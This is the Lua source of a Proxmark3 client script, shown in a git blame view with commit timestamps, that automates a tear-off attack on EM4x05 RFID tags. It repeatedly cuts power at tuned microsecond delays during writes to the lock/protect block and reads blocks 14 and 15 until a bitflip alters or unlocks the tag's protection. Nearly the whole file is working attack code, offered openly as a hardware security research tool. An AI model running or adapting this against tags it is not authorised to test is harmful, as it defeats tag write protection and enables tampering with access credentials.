proxmark3/client/luascripts/lf_em_tearoff_protect.lua

331 lines
12 KiB
Lua
Raw Normal View History

2020-10-11 01:50:13 +08:00
local getopt = require('getopt')
local ansicolors = require('ansicolors')
copyright = 'Iceman'
author = [[
'Author Iceman
CoAuthor Doegox
]]
2021-04-16 07:03:34 +08:00
version = 'v1.0.2'
2020-10-11 01:50:13 +08:00
desc = [[
This is scripts loops though a tear attack and reads expected value.
]]
example = [[
2020-10-12 05:19:10 +08:00
Full automatic, with password:
script run lf_em_tearoff_protect -p 50524F58
Manual fix increment over specified range:
2020-10-11 01:50:13 +08:00
script run lf_em_tearoff_protect -n 2 -s 200 -e 400
Trying repeatedly for a fixed timing, forever or till success:
script run lf_em_tearoff_protect -s 400 -e 400
2020-10-12 05:19:10 +08:00
Tips:
Use a low Q antenna
Move card somehow away from the antenna to a position where it still works
2020-10-11 01:50:13 +08:00
]]
usage = [[
script run lf_em_tearoff_protect [-h] [-n <steps us>] [-p <pwd>] [-s <start us>] [-e <end us>]
]]
arguments = [[
-h This help
-n <steps us> steps in milliseconds for each tear-off
-p <pwd> (optional) use a password
-s <delay us> initial start delay
-e <delay us> end delay, must be larger or equal to start delay
end
]]
2020-10-16 04:01:19 +08:00
local set_tearoff_delay = 'hw tearoff --on --delay %d'
2021-04-16 07:03:34 +08:00
local wr_template = 'lf em 4x05 write --po -d %s -p %s'
2020-10-11 17:09:58 +08:00
2020-10-11 01:50:13 +08:00
---
-- This is only meant to be used when errors occur
local function oops(err)
print('ERROR:', err)
core.clearCommandBuffer()
return nil, err
end
---
-- Usage help
local function help()
print(copyright)
print(author)
print(version)
print(desc)
print(ansicolors.cyan..'Usage'..ansicolors.reset)
print(usage)
print(ansicolors.cyan..'Arguments'..ansicolors.reset)
print(arguments)
print(ansicolors.cyan..'Example usage'..ansicolors.reset)
print(example)
end
2020-10-11 17:09:58 +08:00
local function exit_msg()
print('')
print('================= '..ansicolors.green..'verify with'..ansicolors.reset..' =================')
2020-10-11 20:00:38 +08:00
print(' lf em 4x05_dump')
2020-10-12 04:40:05 +08:00
print('===============================================')
2020-10-11 17:09:58 +08:00
return nil
end
local function reset(wr_value, password)
2020-10-11 19:04:20 +08:00
print('[=] '..ansicolors.red..'resetting the active lock block'..ansicolors.reset)
2021-04-16 07:03:34 +08:00
core.console(wr_template:format(wr_value, password))
2020-10-11 17:09:58 +08:00
end
2020-10-11 01:50:13 +08:00
local function main(args)
--[[
Basically it does the following,
2020-10-12 04:40:05 +08:00
2020-10-11 01:50:13 +08:00
1. hw tear
2020-10-12 04:40:05 +08:00
2. lf em 4x05_write
2020-10-11 01:50:13 +08:00
3. lf em 4x05_read
2020-10-12 04:40:05 +08:00
2021-10-10 07:35:38 +08:00
The first two commands don't need a feedback from the system, so going with core.console commands.
2020-10-11 01:50:13 +08:00
Since the read needs demodulation of signal I opted to add that function from cmdlfem4x.c to the core lua scripting
core.em4x05_read(addr, password)
2020-10-12 04:40:05 +08:00
2020-10-11 01:50:13 +08:00
--]]
local n, password, sd, ed
2020-10-12 04:40:05 +08:00
2020-10-11 17:09:58 +08:00
for o, a in getopt.getopt(args, 'he:s:p:n:') do
2020-10-11 01:50:13 +08:00
if o == 'h' then return help() end
2020-10-11 22:01:34 +08:00
if o == 'n' then n = tonumber(a) end
2020-10-11 01:50:13 +08:00
if o == 'p' then password = a end
if o == 'e' then ed = tonumber(a) end
if o == 's' then sd = tonumber(a) end
end
password = password or ''
if #password ~= 8 then
password = ''
end
2020-10-12 04:40:05 +08:00
2020-10-11 01:50:13 +08:00
local word14, err14 = core.em4x05_read(14, password)
if err14 then
return oops(err14)
end
local word15, err15 = core.em4x05_read(15, password)
if err15 then
return oops(err15)
end
2020-10-11 17:45:59 +08:00
local bit15 = bit.band(0x00008000, word15)
if bit15 == 0x00008000 then
rd_value = ('%08X'):format(word15)
2020-10-11 19:04:20 +08:00
reset(wr_value, password)
2020-10-11 17:45:59 +08:00
else
rd_value = ('%08X'):format(word14)
end
2020-10-11 19:16:23 +08:00
if rd_value == '00008000' then
print('Tag already fully unlocked, nothing to do')
return nil
end
2020-10-11 01:50:13 +08:00
local wr_value = '00000000'
2020-10-11 22:01:34 +08:00
local auto = false
if n == nil then
auto = true
sd = sd or 2000
ed = ed or 6000
n = (ed - sd) / 2
else
if sd == nil or ed == nil then
return oops('start and stop delays need to be defined')
end
if sd > ed then
return oops('start delay can\'t be larger than end delay', sd, ed)
end
2020-10-11 01:50:13 +08:00
end
2020-10-11 17:09:58 +08:00
print('==========================================')
2020-10-11 22:01:34 +08:00
print('Starting EM4x05 tear-off : target PROTECT')
2020-10-11 01:50:13 +08:00
2020-10-11 22:01:34 +08:00
if password ~= '' then
2020-10-11 01:50:13 +08:00
print('target pwd', password)
end
2020-10-11 22:01:34 +08:00
if auto then
print('automatic mode', 'enabled')
end
2020-10-11 01:50:13 +08:00
print('target stepping', n)
print('target delay', sd ,ed)
print('read value', rd_value)
print('write value', wr_value)
2020-10-12 04:40:05 +08:00
print('==========================================')
2020-10-11 01:50:13 +08:00
local res_tear = 0
local res_nowrite = 0
2020-10-12 04:40:05 +08:00
2020-10-11 01:50:13 +08:00
-- fix at one specific delay
if sd == ed then
n = 0
end
local tries = 0
2020-10-11 22:01:34 +08:00
local soon = 0
local late = 0
2020-10-11 01:50:13 +08:00
while sd <= ed do
2020-10-12 04:40:05 +08:00
2020-10-11 22:01:34 +08:00
if auto and n < 1 then -- n is a float
print('[!] Reached n < 1 => '..ansicolors.yellow..'disabling automatic mode'..ansicolors.reset)
ed = sd
auto = false
n = 0
end
if not auto then
sd = sd + n
end
if (tries >= 5) and (n == 0) and (soon ~= late) then
if soon > late then
print(('[!] Tried %d times, soon:%i late:%i => '):format(tries, soon, late)..ansicolors.yellow..'adjusting delay by +1 us'..ansicolors.reset)
2020-10-11 17:09:58 +08:00
sd = sd + 1
2020-10-11 22:01:34 +08:00
ed = ed + 1
else
print(('[!] Tried %d times, soon:%i late:%i => '):format(tries, soon, late)..ansicolors.yellow..'adjusting delay by -1 us'..ansicolors.reset)
sd = sd - 1
ed = ed - 1
2020-10-11 17:09:58 +08:00
end
2020-10-11 22:01:34 +08:00
tries = 0
soon = 0
late = 0
2020-10-11 01:50:13 +08:00
end
2020-10-12 04:40:05 +08:00
2020-10-11 01:50:13 +08:00
io.flush()
if core.kbd_enter_pressed() then
print("aborted by user")
break
end
core.clearCommandBuffer()
local c = set_tearoff_delay:format(sd)
core.console(c);
2021-04-16 07:03:34 +08:00
c = wr_template:format(wr_value, password)
2020-10-11 01:50:13 +08:00
core.console(c)
word14, err14 = core.em4x05_read(14, password)
if err14 then
return oops(err14)
end
2020-10-12 04:40:05 +08:00
2020-10-11 01:50:13 +08:00
local wordstr14 = ('%08X'):format(word14)
word15, err15 = core.em4x05_read(15, password)
if err15 then
return oops(err15)
end
2020-10-12 04:40:05 +08:00
2020-10-11 01:50:13 +08:00
local wordstr15 = ('%08X'):format(word15)
2020-10-12 04:40:05 +08:00
2020-10-11 19:04:20 +08:00
print(('[=] ref:'..rd_value..' 14:%08X 15:%08X '):format(word14, word15))
if wordstr14 == rd_value and wordstr15 == '00000000' then
print('[=] Status: Nothing happened => '..ansicolors.green..'tearing too soon'..ansicolors.reset)
2020-10-11 22:01:34 +08:00
if auto then
sd = sd + n
n = n / 2
print(('[+] Adjusting params: n=%i sd=%i ed=%i'):format(n, sd, ed))
else
soon = soon + 1
end
2020-10-11 19:04:20 +08:00
else
if wordstr15 == rd_value then
if wordstr14 == '00000000' then
print('[=] Status: Protect succeeded => '..ansicolors.green..'tearing too late'..ansicolors.reset)
else
if wordstr14 == rd_value then
print('[=] Status: 15 ok, 14 not yet erased => '..ansicolors.green..'tearing too late'..ansicolors.reset)
else
print('[=] Status: 15 ok, 14 partially erased => '..ansicolors.green..'tearing too late'..ansicolors.reset)
end
end
reset(wr_value, password)
2020-10-11 20:00:38 +08:00
-- it could still happen that a bitflip got committed, let's check...
local word14b, err14b = core.em4x05_read(14, password)
if err14b then
return oops(err14b)
end
local wordstr14b = ('%08X'):format(word14b)
2020-10-11 22:01:34 +08:00
if (wordstr14b == '00000000') then
reset(wr_value, password)
2020-10-16 04:57:57 +08:00
word14b, err14b = core.em4x05_read(14, password)
if err14b then
return oops(err14b)
end
2020-10-11 22:01:34 +08:00
end
2020-10-11 20:00:38 +08:00
if (wordstr14b ~= rd_value) then
2020-10-11 22:01:34 +08:00
local word15b, err15b = core.em4x05_read(15, password)
if err15b then
return oops(err15b)
end
2020-10-11 20:00:38 +08:00
print(('[=] Status: new definitive value! => '..ansicolors.red..'SUCCESS: '..ansicolors.reset..'14: '..ansicolors.cyan..'%08X'..ansicolors.reset..' 15: %08X'):format(word14b, word15b))
return exit_msg()
end
2020-10-11 22:01:34 +08:00
if auto then
ed = sd
sd = sd - n
n = n / 2
print(('[+] Adjusting params: n=%i sd=%i ed=%i'):format(n, sd, ed))
else
late = late + 1
2020-10-11 19:04:20 +08:00
end
else
2020-10-11 17:45:59 +08:00
bit15 = bit.band(0x00008000, word15)
2020-10-11 17:09:58 +08:00
if bit15 == 0x00008000 then
2020-10-11 20:00:38 +08:00
print(('[=] Status: 15 bitflipped and active => '..ansicolors.red..'SUCCESS?: '..ansicolors.reset..'14: %08X 15: '..ansicolors.cyan..'%08X'..ansicolors.reset):format(word14, word15))
print('[+] Committing results...')
reset(wr_value, password)
local word14b, err14b = core.em4x05_read(14, password)
if err14b then
return oops(err14b)
end
local wordstr14b = ('%08X'):format(word14b)
local word15b, err15b = core.em4x05_read(15, password)
if err15b then
return oops(err15b)
end
local wordstr15b = ('%08X'):format(word15b)
print(('[=] ref:'..rd_value..' 14:%08X 15:%08X '):format(word14b, word15b))
bit15 = bit.band(0x00008000, word14b)
if bit15 == 0x00008000 then
if (wordstr14b == wordstr15) then
print(('[=] Status: confirmed => '..ansicolors.red..'SUCCESS: '..ansicolors.reset..'14: '..ansicolors.cyan..'%08X'..ansicolors.reset..' 15: %08X'):format(word14b, word15b))
return exit_msg()
end
if (wordstr14b ~= rd_value) then
print(('[=] Status: new definitive value! => '..ansicolors.red..'SUCCESS: '..ansicolors.reset..'14: '..ansicolors.cyan..'%08X'..ansicolors.reset..' 15: %08X'):format(word14b, word15b))
return exit_msg()
end
print(('[=] Status: failed to commit bitflip => '..ansicolors.red..'FAIL: '..ansicolors.reset..'14: %08X 15: %08X'):format(word14b, word15b))
else
print(('[=] Status: failed to commit => '..ansicolors.red..'FAIL: '..ansicolors.reset..'14: %08X 15: %08X'):format(word14b, word15b))
end
2020-10-16 05:36:17 +08:00
if auto then
n = 0
ed = sd
else
tries = 0
soon = 0
late = 0
end
2020-10-11 17:09:58 +08:00
else
2020-10-11 19:04:20 +08:00
print(('[=] Status: 15 bitflipped but inactive => '..ansicolors.yellow..'PROMISING: '..ansicolors.reset..'14: %08X 15: '..ansicolors.cyan..'%08X'..ansicolors.reset):format(word14, word15))
2020-10-11 22:01:34 +08:00
end
2020-10-11 01:50:13 +08:00
end
2020-10-11 17:09:58 +08:00
end
2020-10-11 22:01:34 +08:00
if not auto then
2020-10-11 17:09:58 +08:00
tries = tries + 1
2020-10-11 01:50:13 +08:00
end
end
end
--[[
In the future, we may implement so that scripts are invoked directly
into a 'main' function, instead of being executed blindly. For future
compatibility, I have done so, but I invoke my main from here.
--]]
main(args)